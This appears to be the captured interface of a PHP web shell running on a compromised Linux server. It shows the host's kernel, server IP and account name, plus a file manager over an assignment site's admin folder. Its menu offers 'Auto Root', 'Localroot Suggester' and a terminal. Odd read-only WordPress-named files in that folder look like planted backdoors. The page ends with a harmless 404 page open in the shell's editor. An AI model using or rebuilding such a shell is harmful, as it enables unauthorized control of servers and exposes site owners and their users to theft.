Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
assignment.work.zone /
admin /
Delete
Unzip
Name
Size
Permission
Date
Action
includes
[ DIR ]
drwxr-xr-x
2026-03-11 22:58
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
404.php
5.09
KB
-rw-r--r--
2026-03-12 12:29
admin-profile.php
4.68
KB
-rw-r--r--
2026-03-13 19:31
assignments.php
20.91
KB
-rw-r--r--
2026-03-30 15:12
deposits.php
8.48
KB
-rw-r--r--
2026-03-12 13:18
error_log
3.7
KB
-rw-r--r--
2026-03-23 09:01
index.php
137
B
-rw-r--r--
2026-03-12 12:26
index_real.php
3.95
KB
-rw-r--r--
2026-03-13 19:31
login.php
2.46
KB
-rw-r--r--
2026-03-13 19:32
logout.php
88
B
-rw-r--r--
2026-03-11 22:57
maintenance.php
3.68
KB
-rw-r--r--
2026-03-12 12:35
payment-methods.php
7.03
KB
-rw-r--r--
2026-03-12 12:35
plans.php
7.85
KB
-rw-r--r--
2026-03-12 12:35
referrals.php
4.91
KB
-rw-r--r--
2026-03-31 10:44
settings.php
17.83
KB
-rw-r--r--
2026-03-31 10:21
tickets.php
9.89
KB
-rw-r--r--
2026-03-12 13:15
users.php
19.8
KB
-rw-r--r--
2026-03-29 05:10
withdraw-methods.php
8.28
KB
-rw-r--r--
2026-03-12 15:17
withdrawals.php
6.26
KB
-rw-r--r--
2026-03-12 15:18
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php header("HTTP/1.0 404 Not Found"); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 - Page Not Found | WorkZone</title> <!-- Google Fonts: Outfit --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Outfit:wght@300;400;500;600;700;800&display=swap" rel="stylesheet"> <!-- FontAwesome for Icons --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> <style> :root { --primary-color: #00d26a; /* WorkZone Green */ --primary-dark: #00a651; --bg-dark: #000000; --card-bg: #111111; --text-light: #ffffff; --text-muted: #888888; --transition: all 0.4s cubic-bezier(0.165, 0.84, 0.44, 1); } * { margin: 0; padding: 0; box-sizing: border-box; } body { background-color: var(--bg-dark); color: var(--text-light); font-family: 'Outfit', sans-serif; height: 100vh; display: flex; align-items: center; justify-content: center; overflow: hidden; position: relative; } /* Ambient Background Glows */ .glow-1 { position: absolute; top: -10%; left: -10%; width: 40%; height: 40%; background: radial-gradient(circle, rgba(0, 210, 106, 0.15) 0%, transparent 70%); filter: blur(80px); z-index: 1; } .glow-2 { position: absolute; bottom: -10%; right: -10%; width: 40%; height: 40%; background: radial-gradient(circle, rgba(0, 150, 255, 0.1) 0%, transparent 70%); filter: blur(80px); z-index: 1; } .container { position: relative; z-index: 2; text-align: center; max-width: 600px; padding: 40px; } .error-code { font-size: 10rem; font-weight: 900; line-height: 1; margin-bottom: 10px; background: linear-gradient(135deg, #fff 30%, var(--primary-color) 100%); -webkit-background-clip: text; -webkit-text-fill-color: transparent; display: inline-block; animation: float 6s ease-in-out infinite; } @keyframes float { 0%, 100% { transform: translateY(0); } 50% { transform: translateY(-20px); } } .icon-box { font-size: 4rem; color: var(--primary-color); margin-bottom: 30px; filter: drop-shadow(0 0 15px rgba(0, 210, 106, 0.3)); animation: pulse 2s infinite; } @keyframes pulse { 0% { transform: scale(1); opacity: 1; } 50% { transform: scale(1.1); opacity: 0.8; } 100% { transform: scale(1); opacity: 1; } } h2 { font-size: 2.5rem; font-weight: 700; margin-bottom: 15px; letter-spacing: -1px; } p { color: var(--text-muted); font-size: 1.1rem; line-height: 1.6; margin-bottom: 40px; max-width: 80%; margin-left: auto; margin-right: auto; } .btn-home { display: inline-flex; align-items: center; gap: 12px; background: linear-gradient(135deg, var(--primary-color), var(--primary-dark)); color: #000; text-decoration: none; padding: 16px 35px; border-radius: 50px; font-weight: 700; font-size: 1rem; transition: var(--transition); box-shadow: 0 10px 30px rgba(0, 210, 106, 0.3); } .btn-home:hover { transform: translateY(-5px) scale(1.02); box-shadow: 0 15px 40px rgba(0, 210, 106, 0.5); filter: brightness(1.1); } .btn-home i { font-size: 1.1rem; } /* Mobile Adjustments */ @media (max-width: 480px) { .error-code { font-size: 7rem; } h2 { font-size: 1.8rem; } p { font-size: 1rem; } } </style> </head> <body> <div class="glow-1"></div> <div class="glow-2"></div> <div class="container"> <div class="icon-box"> <i class="fas fa-exclamation-triangle"></i> </div> <h1 class="error-code">404</h1> <h2>Lost in Space?</h2> <p>The page you are looking for has been moved, deleted, or never existed in the first place.</p> <a href="../index.php" class="btn-home"> <i class="fas fa-home"></i> Back to Homepage </a> </div> </body> </html>